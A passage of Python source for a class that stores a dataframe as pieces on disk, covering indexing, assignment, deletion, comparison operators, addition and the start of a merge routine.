isinstance(key,pd.Series):\n key = list(key)\n elif isinstance(key,slice):\n assert all([ (s is None) or isinstance(s,int) for s in [ key.start,key.stop,key.step ] ])\n key = list(range(self.row_cnt))[key]\n \n \n if len(key) == 0:\n return pd.DataFrame()\n \n \n type_ = type(key[0])\n assert isinstance(key[0],(int_types,str_types,bool_types))\n assert all([ isinstance(k,type_) for k in key ])\n \n if type_ in str_types:\n return self.__getitem__using_strs(key)\n elif type_ in bool_types:\n return self.__getitem__using_bools(key)\n elif type_ in int_types:\n return self.__getitem__using_indices(key)\n else:\n print(\"No such type\" )\n assert False\n else:\n print(\"Something's wrong for the type(s)\")\n assert False\n \n ##################################### Overriding Square Bracket - getitem: END #####################################\n ####################################################################################################################\n\n\n\n \n \n \n \n \n \n ####################################################################################################################\n ##################################### Overriding Square Bracket - setitem: BEG #####################################\n \n def __setitem__using_idx(self, idx, value):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n idx = self.__idx_check(idx)\n\n if isinstance(value, arr_types):\n arr = np.array(value)\n assert len(arr.shape) == 1 # like (4,)\n col_len = arr.shape[0]\n assert col_len == len(self.colnames)\n else:\n pass # you can put any type of single value to the idx row.\n \n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n row_cnt = self.row_cnts[_order]\n if idx > row_cnt - 1:\n idx -= row_cnt\n continue\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.actions[_order] = \"update\"\n type_ = self.types[_order]\n if type_ == \"csv\":\n df.iloc[idx] = value\n self.dfs[_order] = df\n elif type_ == self.__class__.__name__:\n fefs = df\n fefs[idx] = value\n self.dfs[_order] = fefs\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n \n self.renew_idx(_order)\n return\n \n print(\"Error! Find it out!\")\n assert False\n return\n\n\n def __setitem__using_str(self, colname, value):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n # don't use the same checking routine here\n # self.__str_check(colname)\n \n assert isinstance(colname,str_types)\n \n if isinstance(value,(arr_types,range)):\n assert len(value) == self.row_cnt\n value = list(value)\n elif isinstance(value,pd.DataFrame):\n assert len(value) == self.row_cnt\n assert len(value.columns) == 1\n col = list(value.columns)[0]\n value = np.array(value[col])\n else:\n value = [value]*self.row_cnt\n\n cnt = 0\n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n idx = _order\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(idx)\n\n cnt_new = cnt + self.row_cnts[_order]\n df[colname] = value[ cnt : cnt_new ]\n cnt = cnt_new\n self.dfs[_order] = df\n self.actions[_order] = \"update\"\n \n if colname not in self.colnames:\n self.colnames += [colname]\n return\n\n\n \n def __setitem__using_indices(self,indices,value):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n indices = self.__indices_check(indices)\n value = self.__value_check(value, len(self.colnames), len(indices))\n orders = self.__no_overlapping_seq_range()\n \n cnt = 0\n for idx in indices:\n df_ = None\n for _order in orders:\n row_cnt = self.row_cnts[_order]\n if idx > row_cnt - 1:\n idx -= row_cnt\n continue\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n \n type_ = self.types[_order]\n if type_ == \"csv\":\n df_ = df.iloc[idx:(idx+1)]\n elif type_ == self.__class__.__name__:\n fefs = df\n df_ = fefs[idx:(idx+1)]\n else:\n print(\"Type\", type_, \"is not supported\")\n assert False\n break\n \n if len(df_) == 0:\n print(\"Indice could be out of range\")\n assert False\n \n cnt_new = cnt + 1\n if type_ == \"csv\":\n df.iloc[[idx]] = value[ cnt : cnt_new ]\n self.dfs[_order] = df\n elif type_ == self.__class__.__name__:\n fefs[[idx]] = value[ cnt : cnt_new ]\n self.dfs[_order] = fefs\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n cnt = cnt_new \n self.actions[_order] = \"update\"\n \n self.renew_idx(_order)\n\n return\n \n\n def __setitem__using_bools(self,B,value):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__bools_check(B)\n indices = np.array(range(len(B)))[B].tolist()\n self.__setitem__using_indices(indices,value)\n return\n\n\n def __setitem__using_strs(self,colnames,value):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__strs_check(colnames)\n value = self.__value_check(value, len(colnames), self.row_cnt)\n orders = self.__no_overlapping_seq_range()\n \n cum_row_cnt = 0\n for _order in orders:\n idx = _order\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(idx)\n new_cum_row_cnt = cum_row_cnt + self.row_cnts[_order]\n df[colnames] = value[cum_row_cnt:new_cum_row_cnt]\n self.dfs[_order] = df\n cum_row_cnt = new_cum_row_cnt\n self.actions[_order] = \"update\"\n return\n\n \n def __setitem__(self, key, value):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n Accetpable assignments:\n Single:\n - int: fefs[33] = value # row index 33 assignment\n - str: fefs[\"age\"] = value\n Multiple:\n - slice of ints: fefs[20:] = value, fefs[20:50] = value, fefs[::2] = value, ...\n - list of ints: fefs[[1,2,5,10]] = value\n - list of strs: fefs[[\"time\",\"purchased\",\"item\",\"price\"]] = value\n - list of bools: fefs[[True,False,True,...]] = value # must have length == row_cnt\n \"\"\" \n if isinstance(key,str_types):\n self.__setitem__using_str(key, value)\n elif isinstance(key,int_types):\n self.__setitem__using_idx(key, value)\n elif isinstance(key,(arr_types,slice)):\n if isinstance(key,np.ndarray):\n assert len(key.shape) == 1 # must be in (n,)\n key = list(key)\n elif isinstance(key,pd.Series):\n key = list(key)\n elif isinstance(key,slice): \n assert all([ (s is None) or isinstance(s,int) for s in [ key.start,key.stop,key.step ] ])\n key = list(range(self.row_cnt))[key]\n \n type_ = type(key[0])\n assert isinstance(key[0],(int_types,str_types,bool_types))\n assert all([ isinstance(k,type_) for k in key ])\n \n if type_ in str_types:\n self.__setitem__using_strs(key,value)\n elif type_ in bool_types:\n self.__setitem__using_bools(key,value)\n elif type_ in int_types:\n self.__setitem__using_indices(key,value)\n else:\n print(\"No such type\" )\n assert False\n else:\n print(\"Something's wrong for the type(s)\")\n assert False\n \n self.take_actions(max_level=0)\n return\n ##################################### Overriding Square Bracket - setitem: END #####################################\n ####################################################################################################################\n\n \n \n \n \n\n \n\n\n\n ####################################################################################################################\n ##################################### Overriding Square Bracket - delitem: BEG #####################################\n \n def __delitem__using_idx(self,idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n idx = self.__idx_check(idx) \n orders = self.__no_overlapping_seq_range()\n _order, accum_row_cnt = self.__get_piece_idx(idx, orders)\n\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.dfs[_order] = df\n\n idx -= accum_row_cnt\n type_ = self.types[_order]\n row_cnt = self.row_cnts[_order]\n len_ = None\n if type_ == \"csv\":\n \"\"\"\n Since there's no del df[idx] for dataframe\n \"\"\"\n B = [True]*row_cnt\n B[idx] = False\n df = df[B].reset_index(drop=True)\n len_ = len(df)\n elif type_ == self.__class__.__name__:\n fefs = df\n del fefs[idx]\n fefs.take_actions(max_level=4)\n len_ = len(fefs) # since action is taken, this fefs' row_cnt is updated.\n df = fefs\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n self.dfs[_order] = df\n self.actions[_order] = \"update\"\n\n \"\"\"\n Should it be renewed in cache?\n 2023-10-07, decided not to renew in cache.\n \"\"\"\n # self.renew_idx(_order) \n \n if len_ == 0:\n self.actions[_order] = \"delete\"\n return \n\n\n def __delitem__using_str(self,colname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n self.__str_check(colname)\n assert colname != self.seq_col\n\n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n del df[colname]\n self.dfs[_order] = df\n self.actions[_order] = \"save\"\n self.colnames.remove(colname)\n return \n\n\n def __delitem__using_indices(self,indices):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n indices = self.__indices_check(indices)\n indices_copied = dc(indices)\n \n orders = self.__no_overlapping_seq_range()\n\n while len(indices) > 0:\n _order, adjusted_indices = self.__get_indices_in_same_piece(indices, orders)\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n\n type_ = self.types[_order]\n if type_ == \"csv\":\n row_cnt = self.row_cnts[_order]\n B = np.array([True]*row_cnt)\n B[adjusted_indices] = False\n df = df[B].reset_index(drop=True)\n len_ = len(df)\n elif type_ == self.__class__.__name__:\n fefs = df\n del fefs[adjusted_indices]\n fefs.take_actions(max_level=4)\n len_ = fefs.row_cnt # since action is taken, this fefs' row_cnt is updated.\n df = fefs\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n self.dfs[_order] = df\n self.actions[_order] = \"update\"\n\n \"\"\"\n Should it be renewed in cache?\n 2023-10-07, decided not to renew in cache.\n \"\"\"\n # self.renew_idx(_order)\n\n if len_ == 0:\n self.actions[_order] = \"delete\"\n \n indices = indices[len(adjusted_indices):]\n return\n\n\n def __delitem__using_bools(self,B):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n self.__bools_check(B)\n\n indices = np.array(range(len(B)))[B].tolist()\n self.__delitem__using_indices(indices)\n return \n\n\n def __delitem__using_strs(self,colnames):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n self.__strs_check(colnames)\n assert self.seq_col not in colnames\n \n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n df = self.dfs[_order]\n type_ = self.types[_order]\n if df is None:\n df = self.__read_piece(_order)\n \n if type_ == \"csv\":\n for col in colnames:\n del df[col]\n elif type_ == self.__class__.__name__:\n del df[colnames]\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n \n self.dfs[_order] = df\n self.actions[_order] = \"save\"\n \n for col in colnames:\n self.colnames.remove(col)\n return\n\n\n def __delitem__(self, key):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n \"\"\"\n Accetpable delete:\n Single:\n - int: del fefs[33]\n - str: del fefs[\"age\"]\n Multiple:\n - slice of ints: del fefs[20:], del fefs[20:50], del fefs[::2], ...\n - list of ints: del fefs[[1,2,5,10]]\n - list of strs: del fefs[[\"time\",\"purchased\",\"item\",\"price\"]]\n - list of bools: del fefs[[True,False,True,...]] # must have length == row_cnt\n \"\"\" \n if isinstance(key,str_types):\n self.__delitem__using_str(key)\n return\n elif isinstance(key,int_types):\n self.__delitem__using_int(key)\n return\n elif isinstance(key,(arr_types,slice)):\n if isinstance(key,np.ndarray):\n assert len(key.shape) == 1 # must be in (n,)\n key = list(key)\n elif isinstance(key,pd.Series):\n key = list(key)\n elif isinstance(key,slice): \n assert all([ (s is None) or isinstance(s,int) for s in [ key.start,key.stop,key.step ] ])\n key = list(range(self.row_cnt))[key]\n\n type_ = type(key[0])\n assert isinstance(key[0],(int_types,str_types,bool_types))\n assert all([ isinstance(k,type_) for k in key ])\n\n if type_ in str_types:\n self.__delitem__using_strs(key)\n return\n elif type_ in bool_types:\n self.__delitem__using_bools(key)\n return\n elif type_ in int_types:\n self.__delitem__using_indices(key)\n return\n else:\n print(\"No such type\" )\n assert False\n else:\n print(\"Something's wrong for the type(s)\")\n assert False\n \n ##################################### Overriding Square Bracket - delitem: END #####################################\n ####################################################################################################################\n\n\n\n \n \n \n \n \n\n \n\n ######################################################################################################################\n ############################################# Overriding ==, >, <, >=, <=: BEG #######################################\n\n def __get_seq_type(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n if self.seq_type is not None:\n return self.seq_type\n\n \n for df in self.dfs:\n if df is not None:\n break\n \n if df is None:\n S = self.__get_seq(0)\n else:\n S = df[self.seq_col]\n \n s = list(S)[0]\n # Elements in df[seq_col] have to be in the defined types\n type_tups = [ int_types, float_types, str_types, bool_types, arr_types, dt_types ]\n for type_tup in type_tups:\n if isinstance(s, type_tup):\n self.seq_type = type_tup\n return type_tup\n assert False\n \n\n\n\n \"\"\"\n The operators will be about the comparison of timestamps\n Need to check:\n 1. fefs1 fefs2\n 2. fefs df\n 3. df fefs\n 4. fefs ts\n 5. fefs pd.Series(tss)\n \n The codes are strictly prohibited from using fefs[seq_col],\n since such operation will affect the cache.\n \"\"\"\n # def __read_time(self, idx):\n def __read_seq(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n piece = self.pieces[idx]\n fullname = self.__compose_piece_fullname(piece)\n \n type_ = self.types[idx]\n if type_ == \"csv\":\n\n \n # dtf = self.datetime_format\n seq_col = self.seq_col\n\n if self.seq_read_dtype is None:\n df = pd.read_csv(fullname, usecols=[seq_col])\n else:\n df = pd.read_csv(fullname, usecols=[seq_col], dtype={seq_col:self.seq_read_dtype})\n\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df[seq_col] = df[seq_col].apply(lambda x: self.seq_trans_method(x))\n\n df = df.sort_values(by=seq_col).reset_index(drop=True)\n S = df[seq_col]\n \n elif type_ == self.__class__.__name__:\n\n fefs = self.__class__()\n fefs.read(fullname)\n S = fefs.__get_seqs()\n \n else:\n print(\"File type\", self.__class__, \"not supported\")\n assert False\n \n return S\n \n \n\n def __get_seq(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n df = self.dfs[idx]\n type_ = self.types[idx]\n if df is None:\n S = self.__read_seq(idx)\n return S\n\n if type_ == \"csv\":\n S = df[self.seq_col]\n elif type_ == self.__class__.__name__:\n fefs = df\n S = fefs.__get_seqs()\n else:\n assert False\n \n return S\n\n\n\n\n def __get_seqs(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n S = []\n for order_ in self.__no_overlapping_seq_range():\n S_ = self.__get_seq(order_)\n S_ = list(S_)\n S.extend(S_)\n S = pd.Series(S)\n return S\n\n \n def get_seqs(self):\n return self.__get_seqs()\n \n \n\n def __eq_series(self, S):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n seq_type_ = self.__get_seq_type()\n assert self.row_cnt == len(S)\n assert [ isinstance(s,seq_type_) for s in S ] \n S_ = self.__get_seqs()\n B = S_ == S\n return B\n \n \n def __eq_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n assert self.seq_col == fefs.seq_col\n assert self.row_cnt == fefs.row_cnt\n \n S = fefs.__get_seqs()\n return self.__eq_series(S)\n\n\n def __eq_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n assert self.row_cnt == len(df)\n S = df[self.seq_col]\n return self.__eq_series(S)\n\n \n def __eq_s(self, s):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n S = self.__get_seqs()\n return S == s \n\n\n def __eq__(self, other):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n if isinstance(other, pd.Series):\n return self.__eq_series(other)\n elif isinstance(other, self.__class__):\n return self.__eq_fefs(other)\n elif isinstance(other, pd.DataFrame):\n return self.__eq_df(other)\n elif isinstance(other, self.__get_seq_type()):\n return self.__eq_s(other)\n else:\n print(\"Types\", type(other), \"is not supported.\")\n assert False\n\n \n \n\n def __ne_series(self, S):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n seq_type_ = self.__get_seq_type()\n assert self.row_cnt == len(S)\n assert [ isinstance(s,seq_type_) for s in S ] \n S_ = self.__get_seqs()\n B = S_ != S\n return B\n \n \n def __ne_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col == fefs.seq_col\n assert self.row_cnt == fefs.row_cnt\n \n S = fefs.__get_seqs()\n return self.__ne_series(S)\n\n \n def __ne_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.row_cnt == len(df)\n S = df[self.seq_col]\n return self.__ne_series(S)\n\n \n def __ne_s(self, s):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n S = self.__get_seqs()\n return S != s \n\n\n def __ne__(self, other):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n if isinstance(other, pd.Series):\n return self.__ne_series(other)\n elif isinstance(other, self.__class__):\n return self.__ne_fefs(other)\n elif isinstance(other, pd.DataFrame):\n return self.__ne_df(other)\n elif isinstance(other, self.__get_seq_type()):\n return self.__ne_s(other)\n else:\n print(\"Types\", type(other), \"is not supported.\")\n assert False\n\n \n \n \n def __lt_series(self, S):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n seq_type_ = self.__get_seq_type()\n assert self.row_cnt == len(S)\n assert [ isinstance(s,seq_type_) for s in S ]\n S_ = self.__get_seqs()\n B = S_ < S\n return B\n \n\n def __lt_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col == fefs.seq_col\n assert self.row_cnt == fefs.row_cnt\n S = fefs.__get_seqs()\n return self.__lt_series(S)\n\n\n def __lt_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.row_cnt == len(df)\n S = df[self.seq_col]\n return self.__lt_series(S)\n \n\n def __lt_s(self, s):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n S = self.__get_seqs()\n B = S < s\n return B\n \n\n def __lt__(self, other):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n if isinstance(other, pd.Series):\n return self.__lt_series(other)\n elif isinstance(other, self.__class__):\n return self.__lt_fefs(other)\n elif isinstance(other, pd.DataFrame):\n return self.__lt_df(other)\n elif isinstance(other, self.__get_seq_type()):\n return self.__lt_s(other)\n else:\n print(\"Types\", type(other), \"is not supported.\")\n assert False\n\n\n\n\n def __gt_series(self, S):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n seq_type_ = self.__get_seq_type()\n assert self.row_cnt == len(S)\n assert [ isinstance(s,seq_type_) for s in S ]\n S_ = self.__get_seqs()\n B = S_ > S\n return B\n \n\n def __gt_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col == fefs.seq_col\n assert self.row_cnt == fefs.row_cnt\n S = fefs.__get_seqs()\n return self.__gt_series(S)\n\n\n def __gt_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.row_cnt == len(df)\n S = df[self.seq_col]\n return self.__gt_series(S)\n\n \n def __gt_s(self, s):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n S = self.__get_seqs()\n B = S > s\n return B\n \n \n def __gt__(self, other):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n if isinstance(other, pd.Series):\n return self.__gt_series(other)\n elif isinstance(other, self.__class__):\n return self.__gt_fefs(other)\n elif isinstance(other, pd.DataFrame):\n return self.__gt_df(other)\n elif isinstance(other, self.__get_seq_type()):\n return self.__gt_s(other) \n else:\n print(\"Types\", type(other), \"is not supported.\")\n assert False\n\n \n\n def __le_series(self, S):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n seq_type_ = self.__get_seq_type()\n assert self.row_cnt == len(S)\n assert [ isinstance(s,seq_type_) for s in S ]\n S_ = self.__get_seqs()\n B = S_ <= S\n return B\n\n \n def __le_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col == fefs.seq_col\n assert self.row_cnt == fefs.row_cnt\n S = fefs.__get_seqs()\n return self.__le_series(S)\n \n \n def __le_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.row_cnt == len(df)\n S = df[self.seq_col]\n return self.__le_series(S)\n\n\n def __le_s(self, s):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n S = self.__get_seqs()\n B = S <= s\n return B\n \n\n def __le__(self, other):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n if isinstance(other, pd.Series):\n return self.__le_series(other)\n elif isinstance(other, self.__class__):\n return self.__le_fefs(other)\n elif isinstance(other,pd.DataFrame):\n return self.__le_df(other)\n elif isinstance(other, self.__get_seq_type()):\n return self.__le_s(other)\n else:\n print(\"Types\", type(other), \"is not supported.\")\n assert False\n\n\n\n def __ge_series(self, S):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n seq_type_ = self.__get_seq_type()\n assert self.row_cnt == len(S)\n assert [ isinstance(s,seq_type_) for s in S ]\n S_ = self.__get_seqs()\n B = S_ >= S\n return B\n \n\n def __ge_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col == fefs.seq_col\n assert self.row_cnt == fefs.row_cnt\n S = fefs.__get_seqs()\n return self.__ge_series(S)\n \n \n def __ge_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.row_cnt == len(df)\n S = df[self.seq_col]\n return self.__ge_series(S)\n \n\n # def __ge_dt(self, ts):\n def __ge_s(self, s):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n S = self.__get_seqs()\n B = S >= s\n return B\n\n \n def __ge__(self, other):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n if isinstance(other, pd.Series):\n return self.__ge_series(other)\n elif isinstance(other, self.__class__):\n return self.__ge_fefs(other)\n elif isinstance(other, pd.DataFrame):\n return self.__ge_df(other)\n elif isinstance(other, self.__get_seq_type()):\n return self.__ge_s(other) \n else:\n print(\"Types\", type(other), \"is not supported.\")\n assert False\n \n ############################################# Overriding ==, >, <, >=, <=: END #######################################\n ######################################################################################################################\n\n\n\n \n \n \n \n\n\n #####################################################################################################################\n ################################################# Overriding +: BEG #################################################\n def __add_fefs(self, fefs):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col == fefs.seq_col\n assert len(set(self.colnames) - set(fefs.colnames)) == 0\n assert len(set(fefs.colnames) - set(self.colnames)) == 0\n # assert self.datetime_format == tsfefs.datetime_format\n \n \n # assert not fefs.has_pending_actions()\n \n assert fefs.has_valid_status() # no None in the lists\n assert not fefs.conflict_exist()\n \n \n # the added fefs must be under the current path\n \"\"\"\n fefs = dc(fefs)\n fefs.path = self.__compose_fullpath()\n \"\"\"\n fefs = fefs.clone(self.__compose_fullpath(),fefs.name)\n if fefs.name in self.pieces:\n fefs.name = self.gen_valid_piece(prefix=fefs.name+\"_\", suffix=\"\")\n self.pieces += [fefs.name]\n self.types += [ self.__class__.__name__ ]\n \n self.frs += [None]\n self.tos += [None]\n self.row_cnts += [None]\n self.actions += [\"update\"]\n self.action_params += [None]\n self.dfs += [fefs]\n \n self.include_idx(len(self.pieces)-1) # len(self.pieces)-1: the new highest array idx\n\n return self\n \n\n\n def __add_df(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert self.seq_col in df.columns\n assert len(set(self.colnames) - set(df.columns)) == 0\n assert len(set(df.columns) - set(self.colnames)) == 0\n try:\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n _ = df[self.seq_col].apply(lambda x: self.seq_inv_trans_method(x))\n except:\n print(\"Problem with df's %s\"%self.seq_col)\n assert False\n \n \n \n piece = self.gen_valid_piece(prefix=\"\", suffix=\"\")\n \n \n self.vprint(\"Newly added file:\", piece)\n \n \n self.pieces += [piece]\n self.types += [\"csv\"]\n self.frs += [None]\n self.tos += [None]\n self.row_cnts += [None]\n self.actions += [\"update\"]\n self.action_params += [None]\n self.dfs += [df] # the elements can be df or classes of BaseFEFS\n \n self.include_idx(len(self.pieces)-1) # len(self.pieces)-1: the new highest array idx\n \n return self\n\n \n \n def __add__(self, other):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n # print(type(other))\n if isinstance(other, self.__class__):\n return self.__add_fefs(other)\n elif isinstance(other, pd.DataFrame):\n return self.__add_df(other)\n else:\n print(\"Types\", type(other), \"not supported.\")\n assert False\n ################################################# Overriding +: END #################################################\n #####################################################################################################################\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n ####################################################################################################################\n #################################################### MERGE: BEG ####################################################\n # # @classmethod\n # # def merge(cls, left_obj, right_obj, path=\"\", name=\"\", on=\"\", target=None):\n # @staticmethod\n # def merge(left_obj, right_obj, path=\"\", name=\"\", on=\"\", target=None):\n # \"\"\"\n # 1. For class merge, requiring a new path and a new name.\n # 2. The left_obj has to be classes of BaseFEFS.\n # 3. The right_obj can be (pd.DataFrame, classes of BaseFEFS)\n # 4. Target is the targeted columns for the right_obj.\n # \"\"\"\n # assert (path is not None) and (name is not None) and (on is not None)\n # assert \"\" not in [path, name, on]\n # assert isinstance(left_obj,classes of BaseFEFS)\n # assert isinstance(right_obj,(classes of BaseFEFS,pd.DataFrame))\n # fefs = left_obj.merge(right_obj, on, target=target, path=path, name=name)\n # return fefs\n\n \n def __get_fefs_reference(self,path,name):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n if path is None:\n assert name is None\n fefs = self\n elif path is not None:\n assert name is not None \n fefs = self.clone(path, name)\n else:\n assert False\n return fefs\n \n\n \n def merge_with_df(self, df_another, on, target):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n !!!!!!!!!!! Important !!!!!!!!!!!\n I am struggling with the following implementation.\n Ideally, the merge should be done by merging pieces, \n i.e.,\n pd.merge(df_piece, df_another)\n instead of \n pd.merge(self[on], df_another)\n \n This current implementation is for the sake of convenience,\n !!! CHANGE ANYTIME FEELING SLOW !!!\n \"\"\"\n \n # orders = self.__no_overlapping_time_range()\n \n df_self_on = self[on]\n df_another_on = df_another[on+target].drop_duplicates().reset_index(drop=True)\n \n on_col = \"__on__\"\n delim = \"@$*^%\"\n df_self_on[on_col] = df_self_on.apply(lambda x: delim.join([ str(xx) for xx in x ]), axis=1)\n df_self_on = df_self_on[[on_col]]\n df_another_on[on_col] = df_another_on[on].apply(lambda x: delim.join([ str(xx) for xx in x ]), axis=1)\n df_another_on = df_another_on[[on_col] + target]\n \n \"\"\"\n Check 1-to-1\n \"\"\"\n df_uon = df_self_on[[on_col]]\n df_uon = df_uon.drop_duplicates().reset_index(drop=True) \n n = len(df_uon)\n df_one2one = pd.merge(df_uon, df_another_on, on=on_col, how=\"left\").reset_index(drop=True)\n\n # no NA is allowed.\n df_one2one = df_one2one.dropna().reset_index(drop=True)\n assert len(df_one2one) == n \n \n # no duplicate is allowed.\n df_one2one = df_one2one.drop_duplicates().reset_index(drop=True) \n assert len(df_one2one) == n\n\n \n \"\"\"\n real merge\n \"\"\"\n df_target = pd.merge(df_self_on, df_another_on, on=on_col, how=\"left\").reset_index(drop=True)\n # just to reassure\n assert len(df_self_on) == len(df_target)\n \n # the order of df_target must be the same\n for col in target:\n # setting new columns \n assert col not in 